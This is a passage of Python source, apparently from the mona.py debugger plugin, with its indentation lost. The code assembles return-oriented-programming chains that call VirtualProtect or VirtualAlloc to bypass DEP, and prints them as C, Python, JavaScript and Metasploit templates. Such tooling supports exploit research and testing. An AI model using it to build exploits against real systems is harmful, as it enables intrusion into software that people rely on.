thischain[thisreg] = putValueInReg(thisreg,ropptr,"RETN (ROP NOP) [" + MnPointer(ropptr).belongsTo() + "]",suggestions,interestinggadgets,criteria)
else:
thischain[thisreg] = putValueInReg(thisreg,ropptr,"[-] Unable to find ptr to RETN (ROP NOP)",suggestions,interestinggadgets,criteria)
if thistarget.__class__.__name__ == "int" or thistarget.__class__.__name__ == "long":
thischain[thisreg] = putValueInReg(thisreg,thistarget,"0x" + toHex(thistarget) + "-> " + thisreg,suggestions,interestinggadgets,criteria)
if str(thistarget) == "nop":
thischain[thisreg] = putValueInReg(thisreg,0x90909090,"nop",suggestions,interestinggadgets,criteria)
if str(thistarget).startswith("&?"):
#pointer to
rwptr = getAPointer(modulestosearch,criteria,"RW")
if rwptr == 0:
rwptr = getAPointer(modulestosearch,criteria,"W")
if rwptr != 0:
thischain[thisreg] = putValueInReg(thisreg,rwptr,"&Writable location [" + MnPointer(rwptr).belongsTo()+"]",suggestions,interestinggadgets,criteria)
else:
thischain[thisreg] = putValueInReg(thisreg,rwptr,"[-] Unable to find writable location",suggestions,interestinggadgets,criteria)
if str(thistarget).startswith("pop"):
#get distance
if "pop " + thisreg in suggestions:
popptr = getShortestGadget(suggestions["pop "+thisreg])
junksize = getJunk(interestinggadgets[popptr])-4
thismodname = MnPointer(popptr).belongsTo()
thischain[thisreg] = [[popptr,"",junksize],[popptr,"skip 4 bytes [" + thismodname + "]"]]
else:
thischain[thisreg] = [[0,"[-] Couldn't find a gadget to put a pointer to a stackpivot (4 bytes) into "+ thisreg,0]]
if str(thistarget)==("&"):
pattern = step[2]
base = 0
top = TOP_USERLAND
type = "ptr"
al = criteria["accesslevel"]
criteria["accesslevel"] = "R"
ptr_counter = 0
ptr_to_get = 2
oldsilent = silent
silent=True
allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
silent = oldsilent
criteria["accesslevel"] = al
if len(allpointers) > 0:
theptr = 0
for ptrtype in allpointers:
for ptrs in allpointers[ptrtype]:
theptr = ptrs
break
thischain[thisreg] = putValueInReg(thisreg,theptr,"&" + str(pattern) + " [" + MnPointer(theptr).belongsTo() + "]",suggestions,interestinggadgets,criteria)
else:
thischain[thisreg] = putValueInReg(thisreg,0,"[-] Unable to find ptr to " + str(pattern),suggestions,interestinggadgets,criteria)
returnoffset = 0
delayedfill = 0
junksize = 0
# get longest modulename
longestmod = 0
fillersize = 0
for step in routinedefs[routine]:
thisreg = step[0]
if thisreg in thischain:
for gadget in thischain[thisreg]:
thismodname = sanitize_module_name(MnPointer(gadget[0]).belongsTo())
if len(thismodname) > longestmod:
longestmod = len(thismodname)
if showrva:
fillersize = longestmod + 8
else:
fillersize = 0
# modify the chain order (regsequences array)
for reg in movetolast:
if reg in regsequences:
regsequences.remove(reg)
regsequences.append(reg)
regimpact = {}
# create the current chain
ropdbchain = ""
tohex_array = []
for step in regsequences:
thisreg = step
if thisreg in thischain:
for gadget in thischain[thisreg]:
gadgetstep = gadget[0]
steptxt = gadget[1]
junksize = 0
showfills = False
if len(gadget) > 2:
junksize = gadget[2]
if gadgetstep in interestinggadgets and steptxt == "":
thisinstr = interestinggadgets[gadgetstep].lstrip()
if thisinstr.startswith("#"):
thisinstr = thisinstr[2:len(thisinstr)]
showfills = True
thismodname = MnPointer(gadgetstep).belongsTo()
thisinstr += " [" + thismodname + "]"
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(sanitize_module_name(thismodname))
vplogtxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
thischaintxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
else:
vplogtxt += " 0x%s, # %s %s\n" % (toHex(gadgetstep),thisinstr,steptxt)
thischaintxt += " 0x%s, # %s %s\n" % (toHex(gadgetstep),thisinstr,steptxt)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(gadgetstep-tmod.moduleBase),thisinstr.strip(" "))
tohex_array.append(gadgetstep)
if showfills:
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
if returnoffset > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
returnoffset = getOffset(interestinggadgets[gadgetstep])
if delayedfill > 0:
vplogtxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
thischaintxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
delayedfill = 0
if thisinstr.startswith("POP "):
delayedfill = junksize
else:
vplogtxt += createJunk(junksize,"Filler (compensate)",fillersize)
thischaintxt += createJunk(junksize,"Filler (compensate)",fillersize)
if junksize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
else:
# still could be a pointer
thismodname = MnPointer(gadgetstep).belongsTo()
if thismodname != "":
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(sanitize_module_name(thismodname))
vplogtxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),steptxt)
thischaintxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(gadgetstep-tmod.moduleBase),toSize("",alignsize),steptxt)
else:
vplogtxt += " 0x%s, # %s\n" % (toHex(gadgetstep),steptxt)
thischaintxt += " 0x%s, # %s\n" % (toHex(gadgetstep),steptxt)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(gadgetstep-tmod.moduleBase),steptxt.strip(" "))
else:
vplogtxt += " 0x%s,%s # %s\n" % (toHex(gadgetstep),toSize("",fillersize),steptxt)
thischaintxt += " 0x%s,%s # %s\n" % (toHex(gadgetstep),toSize("",fillersize),steptxt)
ropdbchain += ' <gadget value="0x%s">%s</gadget>\n' % (toHex(gadgetstep),steptxt.strip(" "))
if steptxt.startswith("[-]"):
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
returnoffset = 0
if delayedfill > 0:
vplogtxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
thischaintxt += createJunk(delayedfill,"Filler (compensate)",fillersize)
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
delayedfill = 0
vplogtxt += createJunk(junksize,"",fillersize)
thischaintxt += createJunk(junksize,"",fillersize)
if fillersize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
# finish it off
steptxt = ""
if "pushad" in suggestions:
shortest_pushad = getShortestGadget(suggestions["pushad"])
junksize = getJunk(interestinggadgets[shortest_pushad])
thisinstr = interestinggadgets[shortest_pushad].lstrip()
if thisinstr.startswith("#"):
thisinstr = thisinstr[2:len(thisinstr)]
regimpact = getRegImpact(thisinstr)
thismodname = MnPointer(shortest_pushad).belongsTo()
thisinstr += " [" + thismodname + "]"
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(thismodname)
vplogtxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(shortest_pushad - tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
thischaintxt += " %s + 0x%s,%s # %s %s\n" % (modprefix,toHex(shortest_pushad - tmod.moduleBase),toSize("",alignsize),thisinstr,steptxt)
else:
vplogtxt += " 0x%s, # %s %s\n" % (toHex(shortest_pushad),thisinstr,steptxt)
thischaintxt += " 0x%s, # %s %s\n" % (toHex(shortest_pushad),thisinstr,steptxt)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(shortest_pushad-tmod.moduleBase),thisinstr.strip(" "))
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
if fillersize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
vplogtxt += createJunk(junksize,"",fillersize)
thischaintxt += createJunk(junksize,"",fillersize)
if fillersize > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
else:
vplogtxt += " 0x00000000,%s # %s\n" % (toSize("",fillersize),"[-] Unable to find pushad gadget")
thischaintxt += " 0x00000000,%s # %s\n" % (toSize("",fillersize),"[-] Unable to find pushad gadget")
ropdbchain += ' <gadget offset="0x00000000">Unable to find PUSHAD gadget</gadget>\n'
vplogtxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
thischaintxt += createJunk(returnoffset,"Filler (RETN offset compensation)",fillersize)
if returnoffset > 0:
ropdbchain += ' <gadget value="junk">Filler</gadget>\n'
# anything else to add ?
if len(toadd) > 0:
for adds in toadd:
theptr = toadd[adds][0]
freetext = toadd[adds][1]
if theptr > 0:
thismodname = MnPointer(theptr).belongsTo()
freetext += " [" + thismodname + "]"
tmod = MnModule(thismodname)
if not thismodname in modused:
modused[thismodname] = [tmod.moduleBase,tmod.__str__()]
modprefix = "base_" + sanitize_module_name(thismodname)
if showrva:
alignsize = longestmod - len(thismodname)
vplogtxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(theptr - tmod.moduleBase),toSize("",alignsize),freetext)
thischaintxt += " %s + 0x%s,%s # %s\n" % (modprefix,toHex(theptr - tmod.moduleBase),toSize("",alignsize),freetext)
else:
vplogtxt += " 0x%s, # %s\n" % (toHex(theptr),freetext)
thischaintxt += " 0x%s, # %s\n" % (toHex(theptr),freetext)
ropdbchain += ' <gadget offset="0x%s">%s</gadget>\n' % (toHex(theptr-tmod.moduleBase),freetext.strip(" "))
else:
vplogtxt += " 0x%s, # <- Unable to find %s\n" % (toHex(theptr),freetext)
thischaintxt += " 0x%s, # <- Unable to find %s\n" % (toHex(theptr),freetext)
ropdbchain += ' <gadget offset="0x%s">Unable to find %s</gadget>\n' % (toHex(theptr),freetext.strip(" "))
vplogtxt += ' ].flatten.pack("V*")\n'
vplogtxt += '\n return rop_gadgets\n\n'
vplogtxt += ' end\n'
vplogtxt += '\n\n # Call the ROP chain generator inside the \'exploit\' function :\n\n'
calltxt = "rop_chain = create_rop_chain("
argtxt = ""
vplogtxtpy = ""
vplogtxtc = ""
vplogtxtjs = ""
argtxtpy = ""
if showrva:
for themod in modused:
repr_mod = sanitize_module_name(themod)
vplogtxt += " # " + modused[themod][1] + "\n"
vplogtxtpy += " # " + modused[themod][1] + "\n"
vplogtxtc += " // " + modused[themod][1] + "\n"
vplogtxtjs += " // " + modused[themod][1] + "\n"
vplogtxt += " base_" + repr_mod + " = 0x%s\n" % toHex(modused[themod][0])
vplogtxtjs += " var base_" + repr_mod + " = 0x%s;\n" % toHex(modused[themod][0])
vplogtxtpy += " base_" + repr_mod + " = 0x%s\n" % toHex(modused[themod][0])
vplogtxtc += " unsigned int base_" + repr_mod + " = 0x%s;\n" % toHex(modused[themod][0])
calltxt += "base_" + repr_mod + ","
argtxt += "base_" + repr_mod + ","
argtxtpy += "base_" + repr_mod + ","
calltxt = calltxt.rstrip(",") + ")\n"
argtxt = argtxt.strip(",")
argtxtpy = argtxtpy.strip(",")
argtxtjs = argtxtpy.replace(".","")
vplogtxt = vplogtxt.replace("create_rop_chain()","create_rop_chain(" + argtxt + ")")
vplogtxt += '\n ' + calltxt
vplogtxt += '\n\n\n'
# C
vplogtxt += "*** [ C ] ***\n\n"
vplogtxt += " #define CREATE_ROP_CHAIN(name, ...) \\\n"
vplogtxt += " int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \\\n"
vplogtxt += " unsigned int name[name##_length / sizeof(unsigned int)]; \\\n"
vplogtxt += " create_rop_chain(name, ##__VA_ARGS__);\n\n"
vplogtxt += " int create_rop_chain(unsigned int *buf, %s)\n" % ", ".join("unsigned int %s" % _ for _ in argtxt.split(","))
vplogtxt += " {\n"
vplogtxt += " // rop chain generated with mona.py - www.corelan.be\n"
vplogtxt += " unsigned int rop_gadgets[] = {\n"
vplogtxt += thischaintxt.replace("#", "//")
vplogtxt += " };\n"
vplogtxt += " if(buf != NULL) {\n"
vplogtxt += " memcpy(buf, rop_gadgets, sizeof(rop_gadgets));\n"
vplogtxt += " };\n"
vplogtxt += " return sizeof(rop_gadgets);\n"
vplogtxt += " }\n\n"
vplogtxt += vplogtxtc
vplogtxt += " // use the 'rop_chain' variable after this call, it's just an unsigned int[]\n"
vplogtxt += " CREATE_ROP_CHAIN(rop_chain, %s);\n" % argtxtpy
vplogtxt += " // alternatively just allocate a large enough buffer and get the rop chain, i.e.:\n"
vplogtxt += " // unsigned int rop_chain[256];\n"
vplogtxt += " // int rop_chain_length = create_rop_chain(rop_chain, %s);\n\n" % argtxtpy
# Python
vplogtxt += "*** [ Python ] ***\n\n"
vplogtxt += " def create_rop_chain(%s):\n" % argtxt
vplogtxt += "\n # rop chain generated with mona.py - www.corelan.be\n"
vplogtxt += " rop_gadgets = [\n"
vplogtxt += thischaintxt
vplogtxt += " ]\n"
vplogtxt += " return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\n\n"
vplogtxt += vplogtxtpy
vplogtxt += " rop_chain = create_rop_chain(%s)\n\n" % argtxtpy
# Javascript
vplogtxt += "\n\n*** [ JavaScript ] ***\n\n"
vplogtxt += " //rop chain generated with mona.py - www.corelan.be\n"
if not showrva:
vplogtxt += " rop_gadgets = unescape(\n"
allptr = thischaintxt.split("\n")
tptrcnt = 0
for tptr in allptr:
comments = tptr.split(",")
comment = ""
if len(comments) > 1:
# add everything
ic = 1
while ic < len(comments):
comment += "," + comments[ic]
ic += 1
tptrcnt += 1
comment = comment.replace(" ","")
if tptrcnt < len(allptr):
vplogtxt += " \"" + toJavaScript(tptr) + "\" + // " + comments[0].replace(" ","").replace(" ","") + " : " + comment + "\n"
else:
vplogtxt += " \"" + toJavaScript(tptr) + "\"); // " + comments[0].replace(" ","").replace(" ","") + " : " + comment + "\n\n"
else:
vplogtxt += " function get_rop_chain(%s) {\n" % argtxtjs
vplogtxt += " var rop_gadgets = [\n"
vplogtxt += thischaintxt.replace(" #"," //").replace(".","")
vplogtxt += " ];\n"
vplogtxt += " return rop_gadgets;\n"
vplogtxt += " }\n\n"
vplogtxt += " function gadgets2uni(gadgets) {\n"
vplogtxt += " var uni = \"\";\n"
vplogtxt += " for(var i=0;i<gadgets.length;i++){\n"
vplogtxt += " uni += d2u(gadgets[i]);\n"
vplogtxt += " }\n"
vplogtxt += " return uni;\n"
vplogtxt += " }\n\n"
vplogtxt += " function d2u(dword) {\n"
vplogtxt += " var uni = String.fromCharCode(dword & 0xFFFF);\n"
vplogtxt += " uni += String.fromCharCode(dword>>16);\n"
vplogtxt += " return uni;\n"
vplogtxt += " }\n\n"
vplogtxt += "%s" % vplogtxtjs
vplogtxt += "\n var rop_chain = gadgets2uni(get_rop_chain(%s));\n\n" % argtxtjs
vplogtxt += '\n--------------------------------------------------------------------------------------------------\n\n'
# MSF RopDB XML Format - spit out if only one module was selected
if len(modused) == 1:
modulename = ""
for modname in modused:
modulename = modname
objMod = MnModule(modulename)
modversion = objMod.moduleVersion
modbase = objMod.moduleBase
ropdb = '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
ropdb += "<db>\n<rop>\n"
ropdb += " <compatibility>\n"
ropdb += " <target>%s</target>\n" % modversion
ropdb += " </compatibility>\n\n"
ropdb += ' <gadgets base="0x%s">\n' % toHex(modbase)
ropdb += ropdbchain.replace('[' + modulename + ']','').replace('&','').replace('[IAT ' + modulename + ']','')
ropdb += ' </gadgets>\n'
ropdb += '</rop>\n</db>'
# write to file if needed
shortmodname = modulename.replace(".dll","")
ignoremodules = True
if ropdbchain.lower().find("virtualprotect") > -1:
ofile = MnLog(shortmodname+"_virtualprotect.xml")
thisofile = ofile.reset(showheader = False)
ofile.write(ropdb,thisofile)
if ropdbchain.lower().find("virtualalloc") > -1:
ofile = MnLog(shortmodname+"_virtualalloc.xml")
thisofile = ofile.reset(showheader = False)
ofile.write(ropdb,thisofile)
ignoremodules = False
#go to the next one
vpfile = MnLog("rop_chains.txt")
thisvplog = vpfile.reset()
vpfile.write(vplogtxt,thisvplog)
dbg.log("[+] ROP chains written to file %s" % thisvplog)
objprogressfile.write("Done creating rop chains",progressfile)
return vplogtxt
def getRegImpact(instructionstr):
rimpact = {}
instrlineparts = instructionstr.split(" # ")
changers = ["ADD","SUB","ADC","INC","DEC","XOR"]
for i in instrlineparts:
instrparts = i.split(" ")
dreg = ""
dval = 0
if len(instrparts) > 1:
if instrparts[0] in changers:
dreg = instrparts[1]
if instrparts[0] == "INC":
dval = -1
elif instrparts[0] == "DEC":
dval = 1
else:
vparts = i.split(",")
if len(vparts) > 1:
vpart = vparts[1]
dval = vpart
if dreg != "":
if not dreg in rimpact:
rimpact[dreg] = dval
else:
rimpact[dreg] = rimpact[dreg] + dval
return rimpact
def getPickupGadget(targetreg,targetval,freetext,suggestions,interestinggadgets,criteria,modulecriteria,routine=""):
"""
Will attempt to find a gadget that will pickup a pointer to pointer into a register
Arguments : the destination register, the value to pick up, some free text about the value,
suggestions and interestinggadgets dictionaries
Returns :
an array with the gadgets
"""
shortest_pickup = 0
thisshortest_pickup = 0
shortest_move = 0
popptr = 0
pickupfrom = ""
pickupreg = ""
pickupfound = False
pickupchain = []
movechain = []
movechain1 = []
movechain2 = []
disablelist = []
allregs = ["eax","ebx","ecx","edx","ebp","esi","edi"]
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + targetreg) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if shortest_pickup == 0:
# no direct pickup, look for indirect pickup, but prefer EAX first
for movetypes in suggestions:
if movetypes.find("move eax") == 0 and movetypes.endswith("-> " + targetreg):
typeparts = movetypes.split(" ")
movefrom = "eax"
shortest_move = getShortestGadget(suggestions[movetypes])
movechain = getGadgetMoveRegToReg(movefrom,targetreg,suggestions,interestinggadgets)
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + movefrom) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if pickupfound:
break
if shortest_pickup == 0:
# no direct pickup, look for indirect pickup
for movetypes in suggestions:
if movetypes.find("move") == 0 and movetypes.endswith("-> " + targetreg):
typeparts = movetypes.split(" ")
movefrom = typeparts[1]
if movefrom != "esp":
shortest_move = getShortestGadget(suggestions[movetypes])
movechain = getGadgetMoveRegToReg(movefrom,targetreg,suggestions,interestinggadgets)
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + movefrom) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if pickupfound:
break
if shortest_pickup == 0:
movechain = []
#double move
for movetype1 in suggestions:
if movetype1.find("move") == 0 and movetype1.endswith("-> " + targetreg):
interimreg = movetype1.split(" ")[1]
if interimreg != "esp":
for movetype2 in suggestions:
if movetype2.find("move") == 0 and movetype2.endswith("-> " + interimreg):
topickupreg= movetype2.split(" ")[1]
if topickupreg != "esp":
move1 = getShortestGadget(suggestions[movetype1])
move2 = getShortestGadget(suggestions[movetype2])
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + topickupreg) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower in allregs:
pickupfound = False
shortest_pickup = 0
if pickupfound:
movechain = []
movechain1 = getGadgetMoveRegToReg(interimreg,targetreg,suggestions,interestinggadgets)
movechain2 = getGadgetMoveRegToReg(topickupreg,interimreg,suggestions,interestinggadgets)
break
if shortest_pickup > 0:
# put a value in a register
if targetval > 0:
poproutine = putValueInReg(pickupfrom,targetval,freetext,suggestions,interestinggadgets,criteria)
for popsteps in poproutine:
pickupchain.append([popsteps[0],popsteps[1],popsteps[2]])
else:
pickupchain.append([0,"[-] Unable to find API pointer -> " + pickupfrom,0])
# pickup
junksize = getJunk(interestinggadgets[shortest_pickup])
pickupchain.append([shortest_pickup,"",junksize])
# move if needed
if len(movechain) > 0:
for movesteps in movechain:
pickupchain.append([movesteps[0],movesteps[1],movesteps[2]])
if len(movechain2) > 0:
for movesteps in movechain2:
pickupchain.append([movesteps[0],movesteps[1],movesteps[2]])
if len(movechain1) > 0:
for movesteps in movechain1:
pickupchain.append([movesteps[0],movesteps[1],movesteps[2]])
elif (routine.lower() == "virtualalloc" or routine.lower() == "virtualprotect"):
# use alternative technique, in case of virtualprotect/virtualalloc routine
if "pop " + targetreg in suggestions and "pop eax" in suggestions:
# find a jmp [eax]
pattern = "jmp [eax]"
base = 0
top = TOP_USERLAND
type = "instr"
al = criteria["accesslevel"]
criteria["accesslevel"] = "X"
global ptr_to_get
global ptr_counter
ptr_counter = 0
ptr_to_get = 5
theptr = 0
global silent
oldsilent = silent
silent=True
allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
silent = oldsilent
criteria["accesslevel"] = al
thismodname = ""
if len(allpointers) > 0:
for ptrtype in allpointers:
for ptrs in allpointers[ptrtype]:
theptr = ptrs
thismodname = MnPointer(theptr).belongsTo()
break
if theptr > 0:
popptrtar = getShortestGadget(suggestions["pop "+targetreg])
popptreax = getShortestGadget(suggestions["pop eax"])
junksize = getJunk(interestinggadgets[popptrtar])-4
pickupchain.append([popptrtar,"",junksize])
pickupchain.append([theptr,"JMP [EAX] [" + thismodname + "]",0])
junksize = getJunk(interestinggadgets[popptreax])-4
pickupchain.append([popptreax,"",junksize])
pickupchain.append([targetval,freetext,0])
disablelist.append("eax")
pickupfound = True
if not pickupfound:
pickupchain.append([0,"[-] Unable to find gadgets to pickup the desired API pointer into " + targetreg,0])
pickupchain.append([targetval,freetext,0])
return pickupchain,disablelist
def getRopFuncPtr(apiname,modulecriteria,criteria,mode = "iat"):
"""
Will get a pointer to pointer to the given API name in the IAT of the selected modules
Arguments :
apiname : the name of the function
modulecriteria & criteria : module/pointer criteria
Returns :
a pointer (integer value, 0 if no pointer was found)
text (with optional info)
"""
global silent
oldsilent = silent
silent = True
global ptr_to_get
ptr_to_get = -1
rfuncsearch = apiname.lower()
arrfuncsearch = [rfuncsearch]
if rfuncsearch == "virtualloc":
arrfuncsearch.append("virtuallocstub")
ropfuncptr = 0
ropfuncoffsets = {}
ropfunctext = "ptr to &" + apiname + "()"
if mode == "iat":
if rfuncsearch != "":
ropfuncs,ropfuncoffsets = findROPFUNC(modulecriteria,criteria, [rfuncsearch])
else:
ropfuncs,ropfuncoffsets = findROPFUNC(modulecriteria)
silent = oldsilent
#first look for good one
#dbg.log("Found %d pointers" % len(ropfuncs))
for ropfunctypes in ropfuncs:
#dbg.log("%s %s" % (ropfunctypes, rfuncsearch))
if ropfunctypes.lower().find(rfuncsearch) > -1 and ropfunctypes.lower().find("rebased") == -1:
ropfuncptr = ropfuncs[ropfunctypes][0]
break
if ropfuncptr == 0:
for ropfunctypes in ropfuncs:
if ropfunctypes.lower().find(rfuncsearch) > -1:
ropfuncptr = ropfuncs[ropfunctypes][0]
break
#dbg.log("Selected pointer: 0x%08x" % ropfuncptr)
#still haven't found ? clear out modulecriteria, include ASLR/rebase modules (but not OS modules)
if ropfuncptr == 0:
oldsilent = silent
silent = True
limitedmodulecriteria = {}
# search in anything except known OS modules - bad idea anyway
limitedmodulecriteria["os"] = False
ropfuncs2,ropfuncoffsets2 = findROPFUNC(limitedmodulecriteria,criteria)
silent = oldsilent
for ropfunctypes in ropfuncs2:
if ropfunctypes.lower().find(rfuncsearch) > -1 and ropfunctypes.lower().find("rebased") == -1:
ropfuncptr = ropfuncs2[ropfunctypes][0]
ropfunctext += " (skipped module criteria, check if pointer is reliable !)"
break
if ropfuncptr == 0:
ropfunctext = "[-] Unable to find ptr to &" + apiname+"()"
else:
ropfunctext += " [IAT " + MnPointer(ropfuncptr).belongsTo() + "]"
else:
# read EAT
modulestosearch = getModulesToQuery(modulecriteria)
for mod in modulestosearch:
tmod = MnModule(mod)
funcs = tmod.getEAT()
for func in funcs:
funcname = funcs[func].lower()
if funcname.find(rfuncsearch) > -1:
ropfuncptr = func
break
if ropfuncptr == 0:
ropfunctext = "[-] Unable to find required API pointer"
return ropfuncptr,ropfunctext
def putValueInReg(reg,value,freetext,suggestions,interestinggadgets,criteria):
putchain = []
allownull = True
popptr = 0
gadgetfound = False
offset = 0
if "+" in reg:
try:
rval = reg.split("+")[1].strip("h")
offset = int(rval,16) * (-1)
reg = reg.split("+")[0]
except:
reg = reg.split("+")[0]
offset = 0
elif "-" in reg:
try:
rval = reg.split("-")[1].strip("h")
offset = int(rval,16)
reg = reg.split("-")[0]
except:
reg = reg.split("-")[0]
offset = 0
if value != 0:
value = value + offset
if value < 0:
value = 0xffffffff + value + 1
negvalue = 4294967296 - value
ptrval = MnPointer(value)
if meetsCriteria(ptrval,criteria):
# easy way - just pop it into a register
for poptype in suggestions:
if poptype.find("pop "+reg) == 0:
popptr = getShortestGadget(suggestions[poptype])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([value,freetext,0])
gadgetfound = True
break
if not gadgetfound:
# move
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
# get "from" reg
fromreg = movetype.split(" ")[1].lower()
for poptype in suggestions:
if poptype.find("pop "+fromreg) == 0:
popptr = getShortestGadget(suggestions[poptype])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([value,freetext,0])
moveptr = getShortestGadget(suggestions[movetype])
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if gadgetfound:
break
if not gadgetfound or not meetsCriteria(ptrval,criteria):
if meetsCriteria(MnPointer(negvalue),criteria):
if "pop " + reg in suggestions and "neg "+reg in suggestions:
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue,"Value to negate, will become 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+reg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
gadgetfound = True
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop " + fromreg in suggestions and "neg " + fromreg in suggestions:
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue,"Value to negate, will become 0x" + toHex(value)])
negptr = getShortestGadget(suggestions["neg "+fromreg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
